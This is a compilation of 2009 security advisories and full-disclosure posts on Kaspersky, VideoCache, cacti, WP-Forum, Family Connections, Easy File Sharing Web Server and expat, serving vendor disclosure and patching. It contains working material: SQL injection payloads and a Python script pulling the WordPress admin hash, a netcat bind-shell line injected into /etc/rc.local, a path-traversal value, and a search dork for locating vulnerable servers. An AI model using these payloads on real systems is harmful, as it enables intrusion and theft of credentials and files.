"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

Copyright 2009 Hewlett-Packard Development Company, L.P.
Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAksnvJYACgkQ4B86/C0qfVm9iACgprAskDU6znScaM/dvNnwuWnD
TtgAoNAdUbG/wpBdIlYFh3cavxN7AXw4
=lQnk
-----END PGP SIGNATURE-----

Kaspersky Lab Multiple Products Local Privilege Escalation Vulnerability

2009-12-16T04:58:17Z

ShineShadow Security Report 16122009-15

TITLE

Kaspersky Lab Multiple Products Local Privilege Escalation Vulnerability

BACKGROUND

Due to its high level of professionalism and dedication, Kaspersky Lab has become a market leader in the development of antivirus protection. The companys main product, Kaspersky Anti-Virus, regularly receives top awards in tests conducted by respected international research centers and IT publications. Kaspersky Lab was the first to develop many technological standards in the antivirus industry, including full-scale solutions for Linux, Unix and NetWare, a new-generation heuristic analyzer designed to detect newly emerging viruses, effective protection against polymorphic and macro viruses, continuously updated antivirus databases and a technique for detecting viruses in archived files.

Source: http://www.kaspersky.com

VULNERABLE PRODUCTS

Kaspersky Anti-Virus 5.0 for Windows Workstations (5.0.712)
Kaspersky Antivirus Personal 5.0.x
Kaspersky Anti-Virus 6.0 for Windows Workstations (6.0.3.837)
Kaspersky Anti-Virus 6.0 for Windows File Servers (6.0.3.837)
Kaspersky Anti-Virus 7 (7.0.1.325)
Kaspersky Anti-Virus 2009 (8.0.0.x)
Kaspersky Anti-Virus 2010 (9.0.0.463)
Kaspersky Internet Security 7 (7.0.1.325)
Kaspersky Internet Security 2009 (8.0.0.x)
Kaspersky Internet Security 2010 (9.0.0.463)

Prior versions may also be affected.

DETAILS

Insecure permissions have been detected in the multiple Kaspersky Lab antivirus products. Everyone" group has Full Control rights to the BASES folder. The folder consists of antivirus bases, configuration files and executable modules. Local attacker (unprivileged user) can replace some files (for example, executable modules) by malicious file and execute arbitrary code with SYSTEM privileges. This is local privilege escalation vulnerability.

For example, in Kaspersky Anti-Virus 2010 (9.0.0.463) the following attack scenario could be used:
1. An attacker (unprivileged user) replaces one of the *.kdl files by malicious dynamic link library (DLL). The replacing file could be - %ALLUSERSPROFILE%\Application Data\Kaspersky Lab\AVP9\Bases\vulns.kdl.
2. Restart the system.
After restart attackers malicious DLL will be loaded with SYSTEM privileges.

Self-defense of the Kaspersky Anti-Virus will prevent all operations with own files. It can be bypassed using internal shell dialogs in Kaspersky Anti-Virus (for example, "Open" dialog in Quarantine).

For other vulnerable Kaspersky Lab products similar attack scenario could be used.

EXPLOITATION

An attacker must have valid logon credentials to a system where vulnerable software is installed.

WORKAROUND

Kaspersky Lab has addressed this vulnerability by releasing fixed versions of the vulnerable products:
Kaspersky Anti-Virus 2010 (9.0.0.736)
Kaspersky Internet Security 2010 (9.0.0.736)
Kaspersky Anti-Virus 6.0 for Windows Workstations (6.0.4.1212)
Kaspersky Anti-Virus 6.0 for Windows File Servers (6.0.4.1212)

DISCLOSURE TIMELINE

16/07/2009 Initial vendor notification. Secure contacts requested.
16/07/2009 Vendor response
16/07/2009 Vulnerability details sent
21/07/2009 Vendor accepted vulnerability for analysis
0708/2009 Vendor confirmed vulnerability in personal and corporate product lines and notified that the vulnerability will be fixed in new versions of vulnerable products
23/09/2009 Update status query sent
17/09/2009 Vendor response that the vulnerability will be fixed in October but in the last product lines only (personal 2010 CF2 and corporate MP4). Fixing the vulnerability in prior product lines is not planned.
01/10/2009 Corporate product line has been updated (Kaspersky Anti-Virus for Windows Workstations 6.0.4.1212 released)
22/10/2009 Kaspersky Anti-Virus 2010 and Kaspersky Internet Security 2010 Critical Fix 2 released
16/12/2009 Advisory released

CREDITS

Maxim A. Kulakov (ShineShadow)
ss_contacts[at]hotmail.com

VideoCache 1.9.2 vccleaner root vulnerability

2009-12-16T04:37:51Z

====[ SYNOPSIS ]=====================================================

VideoCache is a Squid URL rewriter plugin written in Python for
bandwidth optimization while browsing video sharing websites. Version
1.9.2 allows a user with the privileges of the Squid proxy server to
append semi-arbitrary data to arbitrary files with root privileges, upon
the administrator's execution of the 'vccleaner' utility.

====[ DISCUSSION ]===================================================

VideoCache's 'vccleaner' utility is intended to be executed with root
permissions periodically, to remove expired videos from the cache.
(The utility will refuse to execute without root permissions.)
Upon execution, it looks for old files under the cache directory
/var/spool/videocache (writable by the Squid proxy user) and deletes
them. Each deleted filename is logged to vccleaner.log, located in
/var/log/videocache (directory writable by the Squid proxy user).

====[ EXPLOIT ]======================================================

.........................attacker.........................
$ id
uid=13(proxy) gid=13(proxy) groups=13(proxy)
$ cd /var/log/videocache
$ touch -d 19700101 "/var/spool/videocache/youtube/money
> nc -l -p 31337 -c sushi
> monkey"
$ rm -f vccleaner.log
$ ln -s /etc/rc.local vccleaner.log

.........................admin.........................
# id
uid=0(root) gid=0(root) groups=0(root)
# vccleaner
Videocache cleaning has completed successfully.

.........................postmortem.........................
$ cat /etc/rc.local
2009-12-16 06:56:29,403 INFO START Starting Videocache Cleaner.
2009-12-16 06:56:29,403 INFO DELETE /var/spool/videocache/youtube/money
nc -l -p 31337 -c sushi
monkey Older than 14594 day(s) was deleted.
2009-12-16 06:56:29,404 INFO STOP Stopping Videocache Cleaner.

====[ SHOUT OUTS ]===================================================

Tim, Ben, my buddies at GS, Alien Time Agent, and big man O.

[SECURITY] [DSA 1954-1] New cacti packages fix insufficient input sanitising

2009-12-16T03:47:37Z

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1954-1 security@...
http://www.debian.org/security/ Steffen Joeris
December 16, 2009 http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package : cacti
Vulnerability : insufficient input sanitising
Problem type : remote
Debian-specific: no
CVE Ids : CVE-2007-3112 CVE-2007-3113 CVE-2009-4032
Debian Bugs : 429224

Several vulnerabilities have been found in cacti, a frontend to rrdtool
for monitoring systems and services. The Common Vulnerabilities and
Exposures project identifies the following problems:

CVE-2007-3112, CVE-2007-3113

It was discovered that cacti is prone to a denial of service via the
graph_height, graph_width, graph_start and graph_end parameters.
This issue only affects the oldstable (etch) version of cacti.

CVE-2009-4032

It was discovered that cacti is prone to several cross-site scripting
attacks via different vectors.

CVE-2009-4112

It has been discovered that cacti allows authenticated administrator
users to gain access to the host system by executing arbitrary commands
via the "Data Input Method" for the "Linux - Get Memory Usage" setting.

There is no fix for this issue at this stage. Upstream will implement a
whitelist policy to only allow certain "safe" commands. For the moment,
we recommend that such access is only given to trusted users and that
the options "Data Input" and "User Administration" are otherwise
deactivated.

For the oldstable distribution (etch), these problems have been fixed in
version 0.8.6i-3.6.

For the stable distribution (lenny), this problem has been fixed in
version 0.8.7b-2.1+lenny1.

For the testing distribution (squeeze), this problem will be fixed soon.

For the unstable distribution (sid), this problem has been fixed in
version 0.8.7e-1.1.

We recommend that you upgrade your cacti packages.

Upgrade instructions
- --------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- -------------------------------

Debian (oldstable)
- ------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i.orig.tar.gz
Size/MD5 checksum: 1122700 341b5828d95db91f81f5fbba65411d63
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.6.diff.gz
Size/MD5 checksum: 38419 4ee9e373817ebc32297e1c3de8fee10d
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.6.dsc
Size/MD5 checksum: 590 bb8fb25c6db1cd6a2a785f879943d969

Architecture independent packages:

http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.6i-3.6_all.deb
Size/MD5 checksum: 962816 9093e9f9abaa6c3dbbedad24cc1d4f7e

Debian GNU/Linux 5.0 alias lenny
- --------------------------------

Debian (stable)
- ---------------

Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.

Source archives:

http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b.orig.tar.gz
Size/MD5 checksum: 1972444 aa8a740a6ab88e3634b546c3e1bc502f
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny1.diff.gz
Size/MD5 checksum: 37232 04459452593e23c5e837920cfd0f1789
http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny1.dsc
Size/MD5 checksum: 1117 d67349656ce9514266e7d5d2f378a219

Architecture independent packages:

http://security.debian.org/pool/updates/main/c/cacti/cacti_0.8.7b-2.1+lenny1_all.deb
Size/MD5 checksum: 1847182 3876f128fdcc2aefa63d65531875d2ab

These files will probably be moved into the stable distribution on
its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@...
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.10 (GNU/Linux)

iEYEARECAAYFAksoyH0ACgkQ62zWxYk/rQfXGwCeKMeQqicZ/LayzFqXznC2W0is
EG8AoLUxcdouXG/aTvqnfKJyWZtpA9TM
=CLbl
-----END PGP SIGNATURE-----

[ISecAuditors Security Advisories] WP-Forum <= 2.3 SQL Injection vulnerabilities

2009-12-16T01:58:07Z

=============================================
INTERNET SECURITY AUDITORS ALERT 2009-010
- Original release date: September 28th, 2009
- Last revised: December 15th, 2009
- Discovered by: Juan Galiana Lara
- CVE ID: CVE-2009-3703
- Severity: 8.5/10 (CVSS Base Score)
=============================================

I. VULNERABILITY
-------------------------
WP-Forum <= 2.3 SQL Injection & Blind SQL Injection vulnerabilities

II. BACKGROUND
-------------------------
WP-Forum is a discussion forum plugin for WordPress. It works with
WordPress 2+ version and PHP >= 5.0

III. DESCRIPTION
-------------------------
WP-Forum fails to sanitized user supplied input and is vulnerable to
SQL Injection and Blind SQL Injection. An attacker can obtain any data
of the database including user logins and password's of the WordPress
installation, allowing him to obtain access to the application and
gain administration privileges.

For the SQL Injection vulnerability, is possible to concatenate other
sql requests via "union select" sentence. The parameters "search_max"
and "forum" are affected by this flaw.

Snippet of vulnerable code:

In wpf.class file:

1836 $option_max_days = $_POST['search_max']; // <- this
line is not being sanitized
1837 $option_forums = $_POST['forum'];
1838 if(!$option_max_days)
1839 $option_max_days = 9999;
1840 $op .= " AND $this->t_posts.`date` > SUBDATE(CURDATE(),
INTERVAL $option_max_days DAY) ";
1841
...
1850 foreach((array)$option_forums as $f)
1851 $a .= $f.","; // <- <- this lines is not being
sanitized
1852
1853 $a = substr($a, 0, strlen($a)-1 );
1854 if(!$a)
1855 $w = "";
1856 else
1857 $w = "IN($a)";
1858
1859 $sql = "SELECT $this->t_threads.parent_id as pt,
$this->t_posts.id, text, $this->t_posts.subject,
$this->t_posts.parent_id, $this->t_posts.`date`, MATCH ($what) AGAINST
('$search_string') AS score
1860 FROM $this->t_posts inner join $this->t_threads on
$this->t_posts.parent_id = $this->t_threads.id
1861 WHERE $this->t_threads.parent_id $w
1862 AND MATCH (text) AGAINST ('$search_string') $op";

In the case of the Blind SQL Injection, the vulnerable code is...

In wpf-post.php file:

57 $id = $_GET['id']; // <- $_GET['id'] is directly assigned
58 $thread = $this->check_parms($_GET['t']);
59
60 $out .= $this->header();
61
62 $post = $wpdb->get_row("SELECT * FROM $wpforum->t_posts WHERE
id = $id"); // <- id is used without clean up

other example:

1490 function remove_post(){
1491 global $user_level, $user_ID, $wpdb;
1492 $id = $_GET['id']; // <- $_GET['id'] is directly assigned
1493 $author = $wpdb->get_var("SELECT author_id from
$this->t_posts where id = $id"); // id is used without clean up
...
1503 if($del == "ok"){
1504 $wpdb->query("DELETE FROM $this->t_posts WHERE id
= $id"); <- // id is used without clean up
1505 $this->o .= "<div class='updated'>".__("Post
deleted", "wpforum")."</div>";
1506 }
1507 else
1508 wp_die(__("Cheating, are we?", "wpforum"));
1509
1510 }

the "id" parameter is vulnerable in other parts of the source code..

Also, is possible to delete all records in table $this->t_posts and
$this->t_threads because $_GET['topic'] is not properly sanitized,
injecting something like 1 or 1=1

1479 function remove_topic(){
1480 global $user_level, $user_ID, $wpdb;
1481 $topic = $_GET['topic'];
1482 if($this->is_moderator($user_ID, $this->current_forum)){
1483 $wpdb->query("DELETE FROM $this->t_posts WHERE
parent_id = $topic");
1484 $wpdb->query("DELETE FROM $this->t_threads WHERE
id = $topic");
1485 }
1486 else
1487 wp_die(__("Cheating, are we?", "wpforum"));
1488
1489 }

IV. PROOF OF CONCEPT
-------------------------
In the url: http://example.com/blog/?page_id=3&wpforumaction=search
replacing 'page_id=3' parameter with the number of the WP-Forum page
in each case

Is possible to obtain any data of the database. Here is a proof of
concept to obtain user_pass, user_login and user_email of the user
with id=1 of wp_users table (normally admin).

We have to fill the search_max parameter with the value:

9999 DAY) union select 1,1,1,user_pass,1,1,1 from wp_users where id=1
and subdate(curdate(), interval 9999
9999 DAY) union select 1,1,1,user_login,1,1,1 from wp_users where id=1
and subdate(curdate(), interval 9999
9999 DAY) union select 1,1,1,user_email,1,1,1 from wp_users where id=1
and subdate(curdate(), interval 9999

I wrote a PoC, to get automatically the password hash of the WordPress
admin account:

user@linuz:~$ cat wpforum2.3-poc.py
#!/usr/bin/python

# WP-Forum <= 2.3 SQL Injection PoC
# Juan Galiana Lara
# Internet Security Auditors

import urllib
import urllib2
import re

url = 'http://site//wordpress/?page_id=3&wpforumaction=search'
values = {'search_words' : 'any',
'search_submit' : 'Search',
'search_max' : '999 DAY) union select 1,1,1,user_pass,1,1,1
from wp_users where id=1 or SUBDATE(CURDATE(), INTERVAL 9999' }

data = urllib.urlencode(values)
req = urllib2.Request(url, data)
response = urllib2.urlopen(req)
output = response.read()
o = re.search('viewtopic.+>([$].+)<',output)
if o:
print o.group(1)

user@linuz:~$ python wpforum2.3-poc.py
$P$Bn8oMY.T3kHELf/lnn07L3HXgID4go/
user@linuz:~$

That's it!

For the blind sql injection, here are some examples:

http://example.com/blog/?page_id=3&wpforumaction=editpost&id=1%20and%201=0&t=.0
http://example.com/blog/?page_id=3&wpforumaction=editpost&id=1%20and%201=1&t=.0

http://example.com/blog/?page_id=3&wpforumaction=viewforum&f=2.0&delete_topic&topic=3%20and%201=0
http://example.com/blog/?page_id=3&wpforumaction=viewforum&f=2.0&delete_topic&topic=3%20and%201=1

http://example.com/blog/?page_id=3&wpforumaction=viewtopic&t=1.0&sticky&id=1%20and%201=0
http://example.com/blog/?page_id=3&wpforumaction=viewtopic&t=1.0&sticky&id=1%20and%201=1

Is possible to delete all topics, injecting sql code in "topic" parameter:

http://example.com/blog/?page_id=3&wpforumaction=viewforum&f=1.0&delete_topic&topic=5%20or%201=1

V. BUSINESS IMPACT
-------------------------
Unauthenticated users can obtain or delete any data of the database.
This flaw could result in get access to WordPress accounts including
the administrator one.

VI. SYSTEMS AFFECTED
-------------------------
WP-Forum <= 2.3 are vulnerable.

VII. SOLUTION
-------------------------
Update to version 2.4.

VIII. REFERENCES
-------------------------
http://www.fahlstad.se/wp-plugins/wp-forum/
http://www.wordpress.org/
http://www.isecauditors.com/

IX. CREDITS
-------------------------
This vulnerability has been discovered by
Juan Galiana Lara (jgaliana (at) isecauditors (dot) com).

X. REVISION HISTORY
-------------------------
September 28, 2009: Initial release.
October 13, 2009: Review.
October 19, 2009: Added CVE id.
December 15, 2009: Last revision.

XI. DISCLOSURE TIMELINE
-------------------------
September 28, 2009: Vulnerability discovered
by Internet Security Auditors.
October 13, 2009: Sent to developers. No response.
December 13, 2009: Contact again. Response about its correction.
December 14, 2009: New version published.
December 15, 2009: Advisory released to lists.

XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
Internet Security Auditors accepts no responsibility for any damage
caused by the use or misuse of this information.

Family Connections <= 2.1.3 Multiple Remote Vulnerabilities

2009-12-15T22:52:33Z

Family Connections <= 2.1.3 Multiple Remote Vulnerabilities

Name Family Connections
Vendor http://www.familycms.com
Versions Affected <= 2.1.3

Author Salvatore Fresta aka Drosophila
Website http://www.salvatorefresta.net
Contact salvatorefresta [at] gmail [dot] com
Date 2009-12-16

X. INDEX

I. ABOUT THE APPLICATION
II. DESCRIPTION
III. ANALYSIS
IV. SAMPLE CODE
V. FIX
VI. DISCLOSURE TIMELINE

I. ABOUT THE APPLICATION

Based on one of the world's leading structure and content
management systems - WebSiteAdmin, WSCreator (WS standing
for WebSite) is powerful application for handling multiple
websites. This is a commercial application.
Keep your family "Connected" with this content management
system (CMS) designed specifically with family's in mind.
Key features are: a message board, a photo gallery,
a blog-like "Family News" section, a calendar, an
address book and recipe sharing section.
Each family member has their own personal settings, like
the ability to change the website's theme.
Now with Portuguese, Czech, English, Estonian, German, and
Spanish language Support....

II. DESCRIPTION

Many fields are not properly sanitised and some checks can
be bypassed.

III. ANALYSIS

Summary:

A) Multiple Blind SQL Injection
B) Multiple Arbitrary File Upload
C) Local File Inclusion

A) Blind SQL Injection

All field that I tested are vulnerable to Blind SQL
Injection.
I can't report all vulnerable files because they are many.
The most injections don't require that Magic Quotes GPC
(php.ini) is setted to Off.
However an attacker may try to exploit this vulnerability
using the full path disclosure released by the MySQL error
to write a file into the remote file system, using as
destination path the gallery directories, where the
permissions must be setted to 777.

B) Multiple Arbitrary File Upload

When we want to write a module to upload a file, we must
check the file extension without using the Content-Type
HTTP field, because this last one can be changed. This
CMS uses the Content-Type to validate the extension.

C) Local File Inclusion

In settings.php an user can set the favorite theme to use.
This theme is included using the include_once PHP function.
The original path is themes/ but using the directory
traversal sequence, an user can include arbitrary files.
There is a limit of characters to use, infact the theme
field into the database has a length limit equal to 25.

IV. SAMPLE CODE

A) Multiple Blind SQL Injection

http://site/path/profile.php?member=1 AND IF(ASCII((SELECT CHAR(90)))
= 90, BENCHMARK(10000000, MD5(0x90)), NULL)

http://site/path/messageboard.php?thread=1 AND 1=1
http://site/path/messageboard.php?thread=1 AND 1=0

B) Multiple Arbitrary File Upload

A PoC that upload a PHP shell can be downloaded here:
http://www.salvatorefresta.net/files/poc/PoC-FC213.c

C) Local File Inclusion

Edit the POST packet and send the modified theme value
like the following: ../ReadMe.txt\0

V. FIX

No Fix.

VIII. DISCLOSURE TIMELINE

2009-12-16 Bug discovered
2009-12-16 Initial vendor contact
2009-12-16 Advisory Release

FW: [Full-disclosure] File Access Vulnerability in Easy File Sharing Web Server

2009-12-15T18:35:38Z

I actually DID try to access the .sdb in Ubuntu but that was before I identified the file format of the db as myDB as noted. I do not know of a 'nix based tool for access to the db. If you just want to verify, you can open the .sdb with a text/hex editor and parse out a filename for yourself - it's pretty straight forward. If you want to script the download of all files on a vulnerable server (for testing, of course) then you'll probably need to go ahead and set up a VM.

t

From: Rohit Patnaik [mailto:quanticle@...]
Sent: Tuesday, December 15, 2009 6:29 PM
To: Thor (Hammer of God)
Cc: bugtraq@...; full-disclosure@...
Subject: Re: [Full-disclosure] File Access Vulnerability in Easy File Sharing Web Server

Wow. Very nice find. One question: all the cited tools are Windows executables. Has there been any attempt to run the database viewer in Linux via Wine? I'm wondering if I'm going to have to set up a VM to try to confirm this, or if I can try to do this via Wine.

Although the n3td3v drama is entertaining, its finds like this which keep me subscribed to this list.

Thanks again,
Rohit Patnaik
On Tue, Dec 15, 2009 at 6:16 PM, Thor (Hammer of God) <thor@...> wrote:
File Access Vulnerability in Easy File Sharing Web Server

Discovered by:
Timothy "Thor" Mullen

Testing by Steve "Raging Haggis" Moffat, Hammer of God, Bermuda Labs

Product: Easy File Sharing Web Server, current versions, default installation
Vendor: http://www.sharing-file.com/

Vendor Notification and Disclosure:
08/22/09: EFSW support notified of issue.
08/22/09: EFSW said it is not an issue because you can turn off direct file access.
08/23/09: EFSW support notified that FILES.SDB file can be directly accessed.
08/24/09: EFSW replied, saying 'no, you can't access the file,' even though you can.
12/15/09: Hammer of God released full details after waiting 4 months for vendor to fix.

About:
Easy File Sharing Web Server is an extremely popular web-based file sharing application that has been in use for years.
It is a fast, easy to use commercial, standalone "all-in-one" file-sharing web server.

Customers use a built-in interface to point to files they wish to publish via a menu-driven web application (typically full drives or directories). Files can be shared anonymously, or via EFSWS's built-in user management. EFSWS has built-in SSL encryption to prevent logons from being sent in the clear (as well as all other access). Users log in, and are presented with a menu of files that have been published and that are made available for download.

EFSWS uses the MGH Software "myDB" database plug-in to store db information such as file location, user information (password in the clear), files, forum information, etc. A free db parser is available at:
http://www.mghsoft.com/

Please see vendor site and db engine site for more details.

Vulnerability details:
By default, EFSWS allows a user to download a file directly via a URL if the file name is known. For example, if the file name posted is MyFileName1234.exe, then one could go directly to:
https://www.SiteRunningEFSWS.com/MyFileName1234.exe and immediately begin downloading the file.

In itself, this is not a big issue as one would have to guess any given filename. However, EFSWS always uses the common file name "FILES.SDB" to store all the files being published. This file is stored in the root program directory. While the EFSWS product engine filters out many file types, it does NOT filter out FILES.SDB. If you know someone is running EFSWS, one simply has to access the following URL to anonymously download the FILES.SDB file without authentication:
https://www.SiteRunningEFSWS.com/files.sdb

This will download the FILES.SDB file and will allow an attacker to see every published file via the free viewer record by record. (You can of course view the db as a text file). Entries look like this:

"V:\rootDirForFiles\applications\Acronis Disk Director Suite 10.2160\ioware-w32-x86-30.exe"
"D:\anotherdir\music\crystalmethod\boom.mp3"

One can now access files directly by removing the drive letter and top directory as follows:
https://www.SiteRunningEFSWS.com/music/crystalmethod/boom.mp3

With the ease of database access to filenames, it is trivial to script up a client app to download all published files on the server without authentication over SSL.

Further, it is trivial to determine if someone is running EFSWS, even on an alternate port, by using the following Googledork: inurl:vfolder.ghp. There are other more accurate Googledorks, but I'll leave that up to the researcher.

This will show the (typically) unique file "vfolder.gph" results, where you can retrieve the full company URL from, including portnumber. This too can be scripted.

I am still trying different methods to access the USERS.SDB file, also in the root application directory, which contains all users (even administrative) and passwords (in the clear) in an effort to bypass any mandatory authentication applied, but have not found a way to gain access to this file externally yet.

Vulnerable Versions:
The current version is 5.0, released in August of this year. While certain vulnerability testing took place in our Hammer of God labs in Bermuda, we were not able to check all versions of the software. Self-assessment is trivial, so we will leave it up to user to perform his/her own testing.

Summary:
Many companies use EFSWS to "securely" publish files for access to employees, vendors, and customers via SSL controlled by credential logon. By default, files published may be accesses anonymously if the full file name is used. Full filename details can be anonymously downloaded by accessing the FILES.SDB file, thus immediately allowing anonymous access to any file an attacker wants. Note that other system files (such as logs) can also be accessed. A googledork allows for searching against systems running EFSWS, thus providing a fully scriptable attack against all servers running this product for an anonymous attacker to download all files from all servers over SSL.

Work-arounds:
Ensure that all file access requires logon. Use ISA/TMG to filter requests for /files.sdb.

Get hammered at HammerofGod.com

--------------------
Timothy Thor Mullen
thor@...
www.hammerofgod.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

File Access Vulnerability in Easy File Sharing Web Server

2009-12-15T16:16:51Z

File Access Vulnerability in Easy File Sharing Web Server

Discovered by:
Timothy "Thor" Mullen

Testing by Steve "Raging Haggis" Moffat, Hammer of God, Bermuda Labs

Product: Easy File Sharing Web Server, current versions, default installation
Vendor: http://www.sharing-file.com/

Vendor Notification and Disclosure:
08/22/09: EFSW support notified of issue.
08/22/09: EFSW said it is not an issue because you can turn off direct file access.
08/23/09: EFSW support notified that FILES.SDB file can be directly accessed.
08/24/09: EFSW replied, saying 'no, you can't access the file,' even though you can.
12/15/09: Hammer of God released full details after waiting 4 months for vendor to fix.

About:
Easy File Sharing Web Server is an extremely popular web-based file sharing application that has been in use for years.
It is a fast, easy to use commercial, standalone "all-in-one" file-sharing web server.

Customers use a built-in interface to point to files they wish to publish via a menu-driven web application (typically full drives or directories). Files can be shared anonymously, or via EFSWS's built-in user management. EFSWS has built-in SSL encryption to prevent logons from being sent in the clear (as well as all other access). Users log in, and are presented with a menu of files that have been published and that are made available for download.

EFSWS uses the MGH Software "myDB" database plug-in to store db information such as file location, user information (password in the clear), files, forum information, etc. A free db parser is available at:
http://www.mghsoft.com/

Please see vendor site and db engine site for more details.

Vulnerability details:
By default, EFSWS allows a user to download a file directly via a URL if the file name is known. For example, if the file name posted is MyFileName1234.exe, then one could go directly to:
https://www.SiteRunningEFSWS.com/MyFileName1234.exe and immediately begin downloading the file.

In itself, this is not a big issue as one would have to guess any given filename. However, EFSWS always uses the common file name "FILES.SDB" to store all the files being published. This file is stored in the root program directory. While the EFSWS product engine filters out many file types, it does NOT filter out FILES.SDB. If you know someone is running EFSWS, one simply has to access the following URL to anonymously download the FILES.SDB file without authentication:
https://www.SiteRunningEFSWS.com/files.sdb

This will download the FILES.SDB file and will allow an attacker to see every published file via the free viewer record by record. (You can of course view the db as a text file). Entries look like this:

"V:\rootDirForFiles\applications\Acronis Disk Director Suite 10.2160\ioware-w32-x86-30.exe"
"D:\anotherdir\music\crystalmethod\boom.mp3"

One can now access files directly by removing the drive letter and top directory as follows:
https://www.SiteRunningEFSWS.com/music/crystalmethod/boom.mp3

With the ease of database access to filenames, it is trivial to script up a client app to download all published files on the server without authentication over SSL.

Further, it is trivial to determine if someone is running EFSWS, even on an alternate port, by using the following Googledork: inurl:vfolder.ghp. There are other more accurate Googledorks, but I'll leave that up to the researcher.

This will show the (typically) unique file "vfolder.gph" results, where you can retrieve the full company URL from, including portnumber. This too can be scripted.

I am still trying different methods to access the USERS.SDB file, also in the root application directory, which contains all users (even administrative) and passwords (in the clear) in an effort to bypass any mandatory authentication applied, but have not found a way to gain access to this file externally yet.

Vulnerable Versions:
The current version is 5.0, released in August of this year. While certain vulnerability testing took place in our Hammer of God labs in Bermuda, we were not able to check all versions of the software. Self-assessment is trivial, so we will leave it up to user to perform his/her own testing.

Summary:
Many companies use EFSWS to "securely" publish files for access to employees, vendors, and customers via SSL controlled by credential logon. By default, files published may be accesses anonymously if the full file name is used. Full filename details can be anonymously downloaded by accessing the FILES.SDB file, thus immediately allowing anonymous access to any file an attacker wants. Note that other system files (such as logs) can also be accessed. A googledork allows for searching against systems running EFSWS, thus providing a fully scriptable attack against all servers running this product for an anonymous attacker to download all files from all servers over SSL.

Work-arounds:
Ensure that all file access requires logon. Use ISA/TMG to filter requests for /files.sdb.

Get hammered at HammerofGod.com

--------------------
Timothy Thor Mullen
thor@...
www.hammerofgod.com

[SECURITY] [DSA-1953-1] New expat packages fix denial of service

2009-12-15T12:23:03Z

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1953-1 security@...
http://www.debian.org/security/ Stefan Fritsch
December 15, 2009 http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package : expat
Vulnerability : denial of service
Problem type : remote
Debian-specific: no
CVE Id : CVE-2009-3560
Debian Bug : 560901

Jan Lieskovsky discovered an error in expat, an XML parsing C library,
when parsing certain UTF-8 sequences, which can be exploited to crash an
application using the library.

For the old stable distribution (etch), this problem has been fixed in
version 1.95.8-3.4+etch2.

For the stable distribution (lenny), this problem has been fixed in
version 2.0.1-4+lenny2.

For the testing distribution (squeeze) and the unstable distribution
(sid), this problem will be in version 2.0.1-6.

The builds for the mipsel architecture for the old stable distribution
are not included yet. They will be released when they become available.

We recommend that you upgrade your expat packages.

Upgrade instructions
- --------------------

wget url
will fetch the file for you
dpkg -i file.deb
will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
will update the internal database
apt-get upgrade
will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch (oldstable)
- -------------------------------------------

Oldstable updates are available for alpha, amd64, arm, hppa, i386, ia64, mips, powerpc, s390 and sparc.

Source archives:

http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2.diff.gz
Size/MD5 checksum: 413321 e6d99f30014fccc0ffb9db1554ba1472
http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8.orig.tar.gz
Size/MD5 checksum: 318349 aff487543845a82fe262e6e2922b4c8e
http://security.debian.org/pool/updates/main/e/expat/expat_1.95.8-3.4+etch2.dsc
Size/MD5 checksum: 703 50e1e2ab47fe419e89ef671991ddb3f0

alpha architecture (DEC Alpha)

http://security.debian.org/pool/updates/main/e/expat/libexpat1_1.95.8-3.4+etch2_alpha.deb
Size/MD5 checksum: 69460 59616e932bcd8c86ecd4998fe633f5ee
http://security.debian.org/pool/updates/main/e/expat/libexpat1-udeb_1.95.8-3.4+etch2_alpha.udeb
Size/MD5 checksum: 61198 39a8aaec6ba02d5a206e44db95bc5d87
